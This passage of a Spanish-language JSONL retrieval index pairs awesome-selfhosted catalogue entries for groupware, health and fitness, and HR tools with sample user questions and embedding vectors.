0.03981, 0.03334, 0.0061, -0.02942, -0.08293, -0.07478, 0.00419, -0.01056, 0.07312, 0.01508, -0.09844, 0.06666, 0.03152, 0.00388, -0.04922, -0.05157, -0.17617, -0.01507, 0.04381, -0.03669, 0.03351, -0.0368, 0.05322, 0.03372, -0.0049, -0.02791, 0.00806, 0.00399, -0.00545, -0.02061, 0.03614, -0.09823, 0.01224, -0.01984, -0.08447, 0.10009, -0.01043, 0.0142, 0.01243, 0.03571, -0.01947, 0.05692, 0.01054, -0.0821, 0.03072, 0.05234, 0.00777, -0.0029, 0.05134, -0.00882, -0.07431, 0.04879, 0.03529, 0.07103, -0.03077, -0.0598, 0.03858, -0.03327, -0.00366, 0.03179, -0.00176, -0.06832, -0.01946, 0.05119, -0.0571, -0.01534, 0.01314, -0.03976, -0.01012, 0.06366, 0.00771, 0.02292, -0.08233, 0.0784, 0.03253, -0.0592, -0.07046, -0.02739, -0.00796, -0.13561, -0.05262, -0.05929, -0.0495, 0.03695, -0.05196, -0.03172, 0.04736, -0.01792, -0.03035, 0.06493, 0.02688, 0.05676, 0.03408, 0.00712, 0.05615, 0.00019, -0.02107, -0.04402, 0.00228, -0.05184, -0.02406, 0.00286, 0.03186, 0.0542, 0.02321, 0.01353, 0.06352, 0.03671, -0.01097, 0.02872, -0.0735, -0.02372, -0.00275, 0.01805, 0.01264, -0.02561, 0.01416, 0.00639, 0.01408, 0.02014, -0.02889, -0.02184, 0.024, 0.09303, -0.01619, 0.00853, -0.07453, -0.01947, -0.10383, -0.01944, -0.01727, -0.04141, -0.0149, 0.05461, 0.00621, -0.02289, 0.03006, 0.03379]} -{"tipo": "pregunta", "herramienta": "Groupware", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Groupware", "tema": "groupware", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Groupware: Tracim β€” Collaborative Platform for team collaboration: file,threads,notes,agenda,etc [AGPL-3.0/LGPL-3.0/MIT, Python]. Zimbra Collaboration β€” Email, calendar, collaboration server with Web interface and lots of integrations [GPL-2.0/CPAL-1.0, Java].", "indexar": "con que herramienta puedo montar un servidor colaborativo con archivos, notas y agenda?", "v": [0.11068, 0.12017, -0.21052, -0.24914, -0.06689, -0.12312, -0.03718, -0.00576, -0.03733, -0.09289, -0.08143, -0.09481, 0.08373, -0.01729, 0.05549, 0.13911, 0.23852, -0.1073, 0.00856, 0.05814, -0.01534, 0.07578, -0.02597, -0.00096, 0.00517, -0.05801, 0.0353, -0.00189, -0.08034, 0.08652, -0.00625, 0.01821, 0.06087, 0.00764, -0.03765, -0.07551, 0.0278, 0.08755, -0.09651, -0.03338, -0.08897, 0.07227, -0.10881, 0.05316, 0.02593, -0.01995, -0.00912, -0.05197, 0.04037, 0.05263, 0.00664, -0.13294, -0.1073, 0.04429, -0.05074, -0.04135, 0.16806, -0.17865, 0.01993, -0.10927, -0.16707, 0.07979, -0.12725, -0.06921, 0.02849, 0.04855, -0.04426, -0.05397, -0.10507, 0.1166, -0.03414, 0.01879, 0.04614, -0.12437, 0.03127, 0.06087, 0.03423, -0.00549, -0.00706, 0.02387, 0.03453, -0.01723, 0.01256, 0.14942, -0.05873, -0.09703, 0.10571, -0.07353, 0.03549, 0.07492, 0.02006, 0.1314, -0.05753, -0.00729, 0.03924, -0.02575, 0.1564, 0.0155, 0.02599, -0.00138, 0.07727, 0.00549, -0.01238, 0.03912, 0.03565, 0.07874, -0.03664, 0.0475, 0.01675, 0.01611, 0.10499, 0.05736, 0.02093, 0.04389, -0.05052, -0.06416, 0.00554, 0.03557, -8e-05, -0.03142, 0.0263, 0.07544, -0.05257, -0.00844, 0.0574, -0.04941, 0.04784, 0.08568, 0.00936, -0.03606, -0.0267, 0.0349, -0.0497, 0.02114, -0.01298, 0.0229, 0.04025, -0.0535, -0.08154, -0.07287, 0.08164, 0.01825, 0.01461, -0.04479, 0.08313, 0.01253, 0.06424, -0.05797, -0.02224, 0.03154, 0.05806, -0.02202, -0.02339, -0.04773, -0.11959, -0.0155, 0.0002, -0.03884, -0.0602, 0.02053, -0.01819, 0.01123, -0.00677, 0.07377, -0.02453, -0.08653, 0.02785, 0.07644, 0.05783, 0.03621, -0.00702, 0.03242, 0.0335, -0.05071, 0.00474, -0.03996, -0.06932, -0.06384, 0.02742, -0.06644, -0.04525, -0.00172, -0.02623, 0.02331, -0.00382, -0.01889, 0.05327, -0.00819, 0.01239, 0.04843, 0.02417, 0.02657, -0.02473, -0.00278, 0.03433, -0.05282, -0.02048, -0.03261, 0.03129, -0.01829, -0.00138, -0.01968, -0.00982, -0.04794, 0.01757, 0.01053, -0.07922, 0.04419, 0.06282, 0.05518, 0.01582, -0.0321, 0.06359, -0.05149, -0.01683, -0.01379, -0.02062, -0.0087, -0.01377, 0.0051, 0.01738, 0.0258, 0.07248, -0.03297, 0.02555, 0.05372, 0.01609, -0.007, 0.05256, -0.04026, -0.02381, -0.01282, -0.04963, -0.04286, 0.02614, -0.04974, 0.05031, -0.00827, -0.05867, -0.05597, -0.00109, 0.05761, 0.02336, -0.04918, -0.0686, -0.06984, 0.00406, -0.01685, -0.02104, -0.06467, 0.00041, 0.00987, 0.05536, -0.0604, 0.01069, -0.01287]} -{"tipo": "pregunta", "herramienta": "Health and Fitness", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Health and Fitness", "tema": "health and fitness", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Health and Fitness: Endurain β€” Fitness tracking service designed to give users full control over their data and hosting environment [AGPL-3.0, Docker]. FitTrackee β€” Simple workout/activity tracker [AGPL-3.0, Python/Docker]. Mere Medical β€” Manage all of your medical records from Epic MyChart, Cerner, and OnPatient patient portals in one place. Privacy-focused, self-hosted, and offline-first [⚠, GPL-3.0, Docker/Nodejs]. OpenELIS Global β€” Laboratory information system (LIS/LIMS) for clinical, public health, environmental and vector surveillance labs. FHIR-native, with analyzer integration (ASTM/HL7), quality control and national-scale reporting [MPL-2.0, Java/Docker]. OpenEMR β€” Electronic health records and medical practice management solution [GPL-3.0, PHP/Docker]. wger β€” Web-based personal workout, fitness and weight logger/tracker. It can also be used as a simple gym management utility and offers a full REST API as well [AGPL-3.0, Python/Docker].", "indexar": "que herramienta puedo usar para llevar el control de mis ejercicios de forma privada?", "v": [0.05577, 0.14107, -0.134, -0.17551, -0.00651, -0.03912, -0.0798, 0.0139, 0.00019, -0.09584, -0.11349, 0.00157, 0.0104, -0.0154, 0.0014, -0.0531, 0.10227, -0.12613, -0.05446, 0.05596, -0.06074, -0.0747, -0.08357, -0.0095, -0.06198, 0.12857, 0.06019, 0.00415, -0.23779, 0.03339, -0.0879, 0.13165, 0.04836, -0.07337, -0.06302, -0.00744, -0.03188, 0.03751, 0.02047, 0.0895, -0.04574, 0.02843, -0.077, 0.08723, 0.04362, 0.08611, -0.0272, -0.04523, -0.07167, 0.09066, -0.03874, -0.07558, 0.00122, -0.0374, -0.00985, -0.21736, 0.1211, -0.17024, -0.02034, -0.05979, -0.05345, -0.01587, 0.02904, 0.08167, 0.04031, -0.02701, 0.00985, -0.02677, -0.20153, 0.00216, 0.01856, 0.03284, -0.07507, 0.04612, -0.08393, -0.03508, -0.00666, 0.04822, -0.00478, -0.06113, -0.06553, -0.10051, -0.07397, -0.02463, -0.18141, -0.08875, 0.05791, -0.02236, 0.04002, -0.04953, 0.00501, 0.00936, -0.02278, -0.04121, -0.07701, 0.02316, -0.0664, 0.0663, -0.03076, -0.0086, 0.25298, 0.04573, -0.11645, 0.07077, 0.01255, -0.00687, -0.01103, -0.00882, -0.04498, -0.02913, 0.00453, 0.00929, -0.07718, 0.04873, 0.00663, 0.04546, -0.08879, -0.07682, -0.00674, -0.0432, 0.01084, -0.0361, -0.05144, -0.0876, 0.02764, -0.02121, -0.01419, 0.13721, -0.02706, -0.00015, -0.00134, -0.02148, -0.03321, -0.01485, -0.02426, -0.03045, -0.02482, -0.04766, 0.00856, -0.08246, 0.01447, 0.03184, -0.03166, -0.11365, 0.04241, -0.03364, 0.01263, 0.00242, -0.03231, -0.03189, 0.04035, -0.02517, 0.01688, 0.01135, -0.03198, 0.00819, 0.02585, -0.0083, -0.04296, 0.05387, -0.10678, 0.03018, -0.0291, -0.0158, 0.0637, -0.0791, 0.04992, -0.01376, -0.05725, 0.07912, 0.01403, 0.04401, 0.04795, -0.03119, 0.09159, -0.05468, -0.06852, -0.01139, 0.0088, -0.08325, -0.01484, 0.07751, -0.06154, -0.00201, 0.02042, -0.03163, 0.05072, 0.00959, -0.00092, 0.06326, -0.06742, 0.04114, 0.08732, -0.06146, 0.0005, -0.01271, -0.04083, -0.01529, 0.00835, -0.01904, 4e-05, -0.07842, -0.02177, 0.01467, 0.07763, 0.03709, -0.05736, -0.02069, 0.04139, 0.01174, 0.06983, -0.02607, 0.0849, -0.02854, -0.03835, 0.04046, -0.00767, 0.02763, -0.02284, -0.04707, 0.01868, 0.02293, 0.06334, -0.01267, 0.01788, 0.02809, 0.02945, 0.05292, -0.01171, 0.06502, 0.01682, 0.03328, -0.03119, -0.04619, 0.05746, -0.05465, 0.09221, -0.03465, -0.0481, -0.0223, -0.0106, 0.063, 0.03089, -0.00503, -0.05102, -0.02725, -0.03342, 0.01491, -0.02939, -0.05518, 0.07046, 0.00365, 0.11152, -0.04277, 0.04482, -0.02628]} -{"tipo": "pregunta", "herramienta": "Health and Fitness", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Health and Fitness", "tema": "health and fitness", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Health and Fitness: Endurain β€” Fitness tracking service designed to give users full control over their data and hosting environment [AGPL-3.0, Docker]. FitTrackee β€” Simple workout/activity tracker [AGPL-3.0, Python/Docker]. Mere Medical β€” Manage all of your medical records from Epic MyChart, Cerner, and OnPatient patient portals in one place. Privacy-focused, self-hosted, and offline-first [⚠, GPL-3.0, Docker/Nodejs]. OpenELIS Global β€” Laboratory information system (LIS/LIMS) for clinical, public health, environmental and vector surveillance labs. FHIR-native, with analyzer integration (ASTM/HL7), quality control and national-scale reporting [MPL-2.0, Java/Docker]. OpenEMR β€” Electronic health records and medical practice management solution [GPL-3.0, PHP/Docker]. wger β€” Web-based personal workout, fitness and weight logger/tracker. It can also be used as a simple gym management utility and offers a full REST API as well [AGPL-3.0, Python/Docker].", "indexar": "con que programa puedo gestionar mis historiales mΓ©dicos sin depender de internet?", "v": [0.01181, 0.05573, 0.03785, -0.11201, -0.05594, -0.0015, -0.07349, -0.04827, -0.18117, -0.04856, 0.04153, -0.01294, 0.07399, -0.11269, 0.0774, 0.03149, 0.12148, -0.03552, 0.12963, -0.06532, -0.04282, 0.01042, 0.07581, -0.03594, -0.10098, 0.00211, -0.05093, -0.03565, -0.0366, 0.01671, -0.11759, 0.02312, -0.02301, -0.14803, -0.03961, 0.07038, -0.03283, 0.16254, 0.04264, 0.07468, -0.04971, -0.01473, -0.04034, 0.00184, 0.13783, 0.05499, -0.01259, -0.07866, -0.04625, -0.04338, -0.02665, 0.01621, -0.02936, -0.022, -0.0115, -0.02314, 0.00068, -0.10822, -0.02691, 0.02448, 0.00203, 0.05991, -0.05953, 0.06471, 0.07224, -0.00963, 0.12809, 0.04571, -0.08733, 0.0964, -0.06001, 0.11896, -0.00846, -0.06314, 0.01214, -0.0041, -0.06443, 0.0376, 0.00396, -0.05383, -0.03091, 0.04906, -0.00257, 0.03677, -0.04619, -0.05749, -0.01286, -0.01798, 0.00411, -0.03434, 0.08578, 0.04707, -0.05399, -0.03316, 0.04215, 0.07776, 0.10272, -0.07248, 0.01983, 0.04106, 0.01781, 0.13197, -0.08007, 0.20106, 0.00368, 0.08198, 0.11044, -0.04803, -0.04557, -0.02225, -0.10282, -0.0279, -0.01216, -0.02532, -0.08005, -0.00262, 0.03849, 0.04248, -0.00234, -0.02997, -0.11946, -0.00824, -0.01471, 0.02713, 0.10826, 0.10168, 0.00246, 0.10497, 0.00515, 0.0922, 0.0023, 0.01192, -0.003, -0.12142, -0.06879, -0.08592, 0.02128, -0.09141, 0.04764, -0.09262, -0.03332, -0.02224, -0.04519, 0.01902, 0.07375, -0.18124, -0.07816, -0.06993, -0.03466, -0.04422, -0.06293, 0.10176, -0.03696, 0.14325, -0.08029, 0.07351, 0.05041, -0.00979, -0.04134, 0.01928, -0.06214, -0.02056, 0.05344, 0.00328, 0.06036, 0.01842, -0.09913, 0.10257, 0.01352, 0.01053, -0.04635, 0.05412, 0.01625, -0.06415, -0.02208, -0.01616, -0.08823, -0.06496, 0.06901, -0.01324, -0.02221, 0.01454, 0.03559, 0.06556, -0.0945, -0.05566, -0.12538, 0.07, -0.01769, -0.00426, 0.03629, -0.042, -0.06372, 0.0814, 0.05765, -0.04663, 0.0102, -0.00141, 0.07006, 0.00432, -0.07762, 0.0148, 0.0361, 0.05995, -0.04616, 0.08224, 0.013, 0.02797, 0.02737, 0.09252, 0.03639, -0.0454, -0.04319, -0.00119, -0.03252, -0.03959, 0.01579, -0.01361, -0.03511, -0.08962, -0.00649, -0.02058, 0.0317, 0.03576, 0.01492, -0.07325, 0.05717, 0.01036, -0.00909, 0.01933, -0.05039, 0.01992, -0.05286, 0.0216, -0.02092, 0.00194, 0.01509, -0.08464, -0.08329, -0.00228, -0.05701, 0.08884, 0.03851, -0.02373, 0.00853, -0.06208, -0.12975, 0.03455, 0.04067, -0.00942, -0.03109, 0.03275, 0.05539, -0.02928, 0.06873, 0.09143]} -{"tipo": "pregunta", "herramienta": "Health and Fitness", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Health and Fitness", "tema": "health and fitness", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Health and Fitness: Endurain β€” Fitness tracking service designed to give users full control over their data and hosting environment [AGPL-3.0, Docker]. FitTrackee β€” Simple workout/activity tracker [AGPL-3.0, Python/Docker]. Mere Medical β€” Manage all of your medical records from Epic MyChart, Cerner, and OnPatient patient portals in one place. Privacy-focused, self-hosted, and offline-first [⚠, GPL-3.0, Docker/Nodejs]. OpenELIS Global β€” Laboratory information system (LIS/LIMS) for clinical, public health, environmental and vector surveillance labs. FHIR-native, with analyzer integration (ASTM/HL7), quality control and national-scale reporting [MPL-2.0, Java/Docker]. OpenEMR β€” Electronic health records and medical practice management solution [GPL-3.0, PHP/Docker]. wger β€” Web-based personal workout, fitness and weight logger/tracker. It can also be used as a simple gym management utility and offers a full REST API as well [AGPL-3.0, Python/Docker].", "indexar": "cual es una alternativa libre para crear mi propio sistema de gestiΓ³n clΓ­nica?", "v": [-0.05174, 0.06413, -0.05233, -0.07823, -0.00318, -0.13844, -0.07815, -0.02462, -0.20428, -0.11998, -0.03017, -0.12897, 0.01399, -0.07467, 0.09819, -0.06822, 0.06224, -0.18167, 0.07736, -0.00458, -0.2028, -0.02607, 0.01326, -0.01608, -0.10229, -0.09696, 0.07908, -0.13032, -0.09794, 0.04458, 0.02456, 0.0785, 0.09524, -0.04713, 0.05007, 0.00221, 0.01374, 0.09095, 0.03237, -0.00269, -0.02904, -0.05784, -0.02872, 0.14367, 0.05031, -0.10222, 0.05904, 0.01445, -0.02894, 0.05892, -0.13373, -0.05156, -0.09861, -0.01345, 0.13764, -0.06088, 0.00579, -0.15548, 0.00069, 0.00725, -0.07815, 0.07123, 0.04315, 0.06983, 0.04145, -0.04558, 0.01699, -0.01111, -0.1064, 0.09982, -0.01131, -0.04309, -0.00706, -0.02333, -0.01047, 0.03897, -0.00429, 0.02671, 0.04562, -0.08324, 0.05621, -0.08262, -0.06968, 0.04022, -0.03801, -0.02135, 0.06816, -0.0631, 0.01903, 0.05909, 0.02777, -0.14075, -0.03284, 0.0284, 0.01767, -0.02584, 0.0279, 0.02274, -0.05765, 0.04589, 0.04947, 0.01256, -0.09493, 0.00805, -0.00702, -0.00353, 0.05062, -0.06019, -0.04514, -0.00849, -0.07406, -0.01852, 0.03761, -0.04092, -0.0592, -0.02646, -0.02874, 0.08846, -0.01136, 0.01553, -0.04995, 0.00182, -0.03831, -0.15099, -0.00508, 0.02337, -0.01855, 0.05223, -0.00337, 0.11176, 0.02134, -0.02918, -0.1236, -0.11065, -0.05943, -0.0218, 0.01507, 0.04044, 0.00108, -0.03051, -0.0915, 0.07364, 0.02289, -0.11608, 0.02716, -0.14069, 0.00599, -0.11644, 0.01941, 0.03287, -0.10265, 0.05089, 0.01965, 0.08281, -0.12467, 0.0855, 0.01099, -0.06778, -0.02895, 0.05811, 0.01049, 0.02465, 0.00937, 0.0543, -0.04916, 0.00158, -0.01731, -0.04238, -0.00331, 0.01901, 0.02541, 0.07875, 0.04192, -0.04178, 0.07754, -0.07628, -0.0466, -0.13577, 0.05552, -0.06718, 0.01204, 0.02786, -0.06026, 0.00016, -0.00664, -0.07254, -0.04209, 0.08203, 0.0276, 0.03183, 0.00471, -0.01047, -0.03151, -0.07342, -0.0006, -0.00939, 0.02053, -0.11971, 0.01912, 0.004, -0.06098, 0.03227, 0.01706, -0.04925, -0.06331, 0.00482, -0.01904, 0.04459, 0.0421, 0.0825, 0.09141, 0.04005, 0.0774, 0.00097, -0.05759, 0.03768, -0.01181, -0.0173, 0.01419, -0.08029, 0.07497, 0.01229, 0.01293, 0.00337, -0.02034, 0.02505, 0.01985, 0.06627, -0.03135, -0.00893, 0.02594, -0.07284, 0.01067, 0.00656, 0.01221, -0.00388, 0.06901, -0.0221, -0.0117, -0.03306, 0.07742, 0.10989, -0.01083, -0.03544, -0.03005, -0.02567, -0.08166, -0.01414, -0.03455, -0.09056, -0.02015, 0.0267, 0.00744, -0.02103, 0.01711, 0.01767]} -{"tipo": "pregunta", "herramienta": "Health and Fitness", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Health and Fitness", "tema": "health and fitness", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Health and Fitness: Wingfit β€” Minimalist fitness app to plan your workouts, track your personal records and leverage smartwatch data [CC-BY-SA-4.0, Python/Docker].", "indexar": "que aplicaciΓ³n minimalista hay para planificar entrenamientos y registrar mis marcas personales?", "v": [0.2195, 0.06877, -0.02643, -0.35522, 0.03392, -0.08888, -0.09908, 0.03561, -0.1655, -0.06488, 0.04535, -0.04842, 0.11148, -0.04065, 0.03488, 0.03692, 0.01043, 0.00103, 0.0394, 0.05323, -0.08536, -0.00203, -0.10504, -0.00536, -0.06123, -0.01136, 0.07136, -0.06389, -0.19116, 0.05324, -0.09959, 0.15505, 0.05999, -0.0563, 0.01801, -0.01047, -0.02472, -0.03521, -0.045, 0.00994, 0.00662, 0.05308, -0.03423, 0.01352, 0.02638, 0.0726, 0.03689, 0.02279, -0.05031, -0.01271, 0.00564, 0.05479, 0.06375, 0.02364, -0.0049, -0.04493, 0.13246, -0.1211, 0.07865, -0.0181, -0.01378, -0.0201, 0.08603, 0.09582, 0.09011, -0.04447, 0.07335, 0.04511, -0.07907, -0.09129, 0.00146, 0.03361, -0.06013, -0.08728, 0.08588, 0.00875, 0.0935, 0.02255, 0.04335, -0.00208, -0.09402, -0.1208, -0.06955, 0.07516, -0.09678, 0.08529, -0.0182, 0.05851, 0.01723, 0.00363, 0.05148, -0.01463, -0.12769, -0.12625, 0.01313, 0.06221, 0.0837, 0.08761, 0.034, 0.07276, 0.01654, 0.06029, -0.03904, 0.04645, -0.09993, 0.05506, 0.02376, -0.00247, -0.01977, -0.05251, -0.04117, -0.07268, -0.12049, 0.02822, 0.05689, -0.02125, -0.03473, -0.11843, 0.03736, -0.03349, -0.04451, 0.05931, -0.00159, -0.03346, -0.02691, -0.00609, -0.05577, 0.02273, 0.03653, 0.0681, 0.08147, -0.03358, -0.10836, 0.02423, -0.05683, 0.01202, -0.12444, 0.0018, 0.03167, -0.01559, -0.03002, -0.00747, -0.06936, -0.0464, 0.06388, 0.00597, 0.01756, -0.09112, -0.05984, 0.04961, -0.01669, -0.05807, 0.02308, 0.01328, -0.05455, 0.0307, -0.05435, -0.07806, 0.05211, 0.00921, -0.07602, 0.08415, -0.07172, -0.04521, 0.01446, -0.10982, 0.10491, 0.02812, 0.03962, 0.12387, 0.05661, -0.02452, 0.01198, -0.04929, 0.06061, 0.02595, 0.01636, -0.02908, 0.01813, 0.01379, -0.04905, -0.01286, 0.00994, 0.01917, 0.01058, -0.00758, -0.04658, 0.07249, 0.00811, -0.00447, -0.04646, 0.04005, 0.00655, -0.04688, 0.0493, 0.00801, 0.01097, -0.01315, -0.03193, 0.02819, -0.04856, -0.07931, -0.04321, 0.03122, 0.08926, 0.0483, -0.07066, -0.00646, -0.01357, 0.02723, 0.01011, -0.03704, 0.00837, -0.06325, -0.04927, 0.05233, -0.00104, 0.02634, 0.00846, 0.0037, 0.01188, 0.05572, 0.03444, -0.02477, -0.01477, 0.02459, 0.00744, -0.01609, 0.01048, 0.02326, -0.00358, 0.01279, -0.07254, -0.08964, 0.00134, 0.03816, 0.05481, 0.03413, -0.02865, -0.05958, -0.01781, 0.0458, 0.05013, 0.02436, -0.02899, -0.06297, -0.00583, 0.05802, 0.01003, -0.04081, 0.04989, 0.0393, 0.0672, -0.04217, 0.04221, -0.06919]} -{"tipo": "pregunta", "herramienta": "Health and Fitness", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Health and Fitness", "tema": "health and fitness", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Health and Fitness: Wingfit β€” Minimalist fitness app to plan your workouts, track your personal records and leverage smartwatch data [CC-BY-SA-4.0, Python/Docker].", "indexar": "con quΓ© programa puedo conectar mis datos de reloj inteligente para organizar mi gimnasio?", "v": [0.03139, 0.17961, -0.13316, -0.20833, 0.01963, -0.11288, -0.15754, 0.05728, -0.20819, -0.11782, -0.09111, -0.10803, 0.03646, -0.0092, 0.05381, 0.04159, 0.12713, -0.07733, -0.05288, -0.02806, -0.05363, 0.01514, -0.02073, -0.07853, -0.01587, -0.04914, 0.08818, 0.05861, -0.13477, 0.03396, -0.03736, -0.04333, 0.01855, -0.07906, 0.02753, 0.03401, 0.00867, 0.18607, -0.01086, -0.08384, -0.09729, 0.02253, -0.02822, 0.03802, 0.1947, 0.03003, 0.10086, -0.05591, 0.03345, 0.02479, -0.19404, 0.0646, 0.06733, 0.01051, -0.02569, -0.06165, -0.01435, -0.06234, -0.00386, -0.03125, 0.02453, 0.01153, 0.01592, 0.06801, 0.0577, 0.03594, -0.01109, 0.05589, -0.05334, -0.04611, -0.0727, -0.00463, -0.08107, -0.00039, -0.00384, 0.08646, 0.03694, -0.00334, 0.04862, 0.0102, -0.11452, -0.07394, -0.01247, 0.0646, -0.03845, -0.0163, 0.02423, 0.0114, -0.0128, -0.01055, -0.03412, 0.05304, -0.04376, -0.00695, 0.03996, 0.03964, 0.08432, 0.03874, 0.00525, 0.12306, 0.01551, 0.00499, -0.06094, 0.16605, -0.08112, 0.04388, 0.01284, 0.1283, -0.00692, -0.05774, -0.10542, -0.06793, -0.0894, -0.08517, 0.01722, 0.02321, -0.03072, -0.02077, 0.03054, 0.05278, -0.03687, -0.01111, 0.0294, -0.02482, -0.00754, 0.03664, 0.00314, 0.08991, 0.09365, 0.07394, 0.03012, -0.00982, 0.01667, -0.08889, -0.02739, 0.05546, -0.05685, -0.07251, -0.03158, -0.0254, -0.00294, 0.04451, -0.04079, -0.0358, 0.03103, -0.07306, 0.04135, 0.01711, -0.0761, 0.04417, -0.02008, 0.03413, 0.05055, 0.0557, -0.05345, -0.05472, 0.03057, -0.07878, 0.00951, 0.01416, -0.04349, 0.0364, -0.01969, -0.03744, 0.12088, -0.06043, 0.01745, 0.03977, 0.0502, 0.10341, -0.06569, 0.07195, 0.06778, -0.04826, -0.03911, -0.04241, -0.01768, -0.07359, 0.06558, -0.01806, -0.00307, 0.09719, 0.04219, -0.06265, -0.04216, -0.00598, 0.0266, 0.02805, 0.02786, -0.04001, 0.02333, 0.03419, 0.05371, -0.01419, 0.07041, -0.07389, -0.02876, -0.06146, 0.04834, 0.03194, -0.0221, 0.0117, 0.00054, 0.12646, -0.00777, 0.12807, 0.00483, -0.01559, 0.04669, 0.01738, 0.07043, -0.05543, 0.10318, 0.0089, -0.11448, 0.05091, 0.01515, 0.01518, 0.02807, 0.02333, -8e-05, 0.04396, 0.02443, -0.0014, -0.03407, -0.07472, 0.05991, 0.0905, 0.05567, 0.0198, -0.02224, -0.06306, -0.00641, 0.02528, 0.01481, -0.01065, -0.01393, -0.03486, -0.03491, -0.04463, -0.0175, 0.02388, 0.02085, -0.00924, -0.03016, 0.00767, -0.03783, 0.06181, -0.02696, -0.0539, -0.02693, 0.01665, 0.07112, -0.0993, 0.04219, 0.01331]} -{"tipo": "pregunta", "herramienta": "Health and Fitness", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Health and Fitness", "tema": "health and fitness", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Health and Fitness: Wingfit β€” Minimalist fitness app to plan your workouts, track your personal records and leverage smartwatch data [CC-BY-SA-4.0, Python/Docker].", "indexar": "existe alguna herramienta libre tipo Docker para gestionar mi actividad fΓ­sica?", "v": [-0.08141, 0.10742, -0.11094, -0.14743, -0.05655, -0.11707, -0.13267, 0.06425, -0.09221, -0.17177, -0.01526, -0.12265, -0.02639, -0.03968, 0.17109, -0.07827, 0.0828, -0.19123, -0.06473, 0.04072, -0.10728, -0.02522, -0.06636, -0.05886, -0.04751, -0.02031, 0.02796, -0.0905, -0.22274, 0.03936, 0.07678, 0.08046, 0.10612, -0.17236, -0.01793, -0.06993, -0.02262, -0.04673, 0.13155, -0.01095, -0.06818, 0.09366, -0.06951, 0.03458, 0.06742, 0.07657, -0.08454, -0.07168, 0.03258, 0.09361, -0.00701, -0.04534, -6e-05, -0.08842, -0.01944, -0.07786, 0.12458, -0.12222, -0.01581, -0.07498, -0.04309, 0.0776, -0.04421, -0.05738, 0.0486, 0.03302, 0.1639, -0.05455, -0.06612, 0.0883, 0.00364, -0.03753, -0.06161, 0.10505, -0.03424, -0.01921, 0.06941, 0.10539, 0.00619, 0.06144, 0.01947, 0.03502, -0.06704, 0.06499, -0.08347, -0.13965, 0.08944, -0.08795, 0.00945, 0.02884, -0.00012, 0.0754, -0.04027, -0.01665, -0.07548, -0.00548, -0.06458, 0.09565, -0.01911, 0.08035, 0.16799, 0.11684, -0.08658, -0.03713, -0.00104, -0.02051, -0.02846, -0.00038, -0.06159, 0.03145, -0.04066, -0.01129, -0.03786, -0.03357, -0.06226, 0.12628, -0.07183, -0.08809, 0.03893, -0.02188, -0.00952, -0.00893, -0.02569, -0.01105, 0.02042, -0.02559, 0.00084, 0.11297, -0.01878, 0.02525, 0.03651, -0.05133, -0.03274, -0.07915, -0.10228, 0.00244, -0.03701, -0.04085, -0.00679, -0.06955, -0.01688, 0.06998, -0.05153, -0.03199, 0.00457, -0.00584, 0.05495, 0.01264, -0.05244, -0.00205, 0.02756, -0.04993, 0.00775, 0.06031, -0.02079, 0.04742, 0.04816, -0.01808, -0.06502, 0.0625, -0.05311, 0.02938, -0.0382, -0.05155, -0.00186, 0.03411, 0.00327, -0.01686, -0.02553, 0.05598, -0.01076, -0.0003, 0.07515, -0.02707, 0.03805, -0.04711, 0.02206, -0.01519, 0.05522, -0.07926, 0.09102, 0.02617, 0.01134, 0.01597, -0.04512, -0.02135, -0.03694, 0.01915, -0.01035, 0.00716, 0.01674, 0.01189, 0.00394, -0.06779, 0.05838, -0.01849, 0.02001, -0.00348, 0.05168, 0.0287, -0.07272, -0.0596, -0.00089, 0.03162, -0.00313, 0.10349, -0.01757, 0.02266, 0.03229, -0.04284, 0.03853, -0.00771, 0.02671, -0.00813, -0.01293, -0.01642, 0.07244, 0.05311, 0.01555, -0.07039, 0.04151, 0.00476, 0.05961, -0.0208, -0.00017, 0.01895, 0.0721, 0.02847, 0.0127, 0.05217, 0.05224, 0.00042, 0.01838, 0.0071, -0.00583, -0.02887, 0.08389, -0.0474, 0.02492, 0.01688, -0.00019, 0.01891, 0.02035, 0.00433, -0.04667, 0.04062, -0.04061, 0.03028, -0.0642, -0.04427, -0.0043, 0.00431, 0.01829, 0.00668, 0.00032, -0.01978]} -{"tipo": "pregunta", "herramienta": "Human Resources Management (HRM)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Human Resources Management (HRM)", "tema": "human resources management (hrm)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Human Resources Management (HRM): admidio β€” User management system for websites of organizations and groups. The system has a flexible role model so that it’s possible to reflect the structure and permissions of your organization [GPL-2.0, PHP/Docker]. Frappe HR β€” Complete HRMS solution with over 13 different modules right from employee management, onboarding, leaves, to payroll, taxation, and more [GPL-3.0, Docker/Python/Nodejs]. MintHCM β€” Tool for Human Capital Management based on two popular, well-known business applications SugarCRM Community Edition and SuiteCRM [AGPL-3.0, PHP].", "indexar": "que sistema de gestiΓ³n de personal me sirve para organizar empleados y permisos", "v": [0.08285, 0.14401, -0.05083, -0.2878, 0.06973, -0.11406, -0.03601, -0.08846, -0.11097, -0.14394, -0.1372, 0.00833, 0.15365, -0.1069, 0.08675, -0.05299, 0.11408, -0.06366, -0.02244, 0.07457, -0.02721, 0.04696, 0.03988, 0.0768, -0.08089, 0.00558, 0.14889, -0.14391, -0.18891, 0.02157, 0.02263, -0.01136, 0.0028, 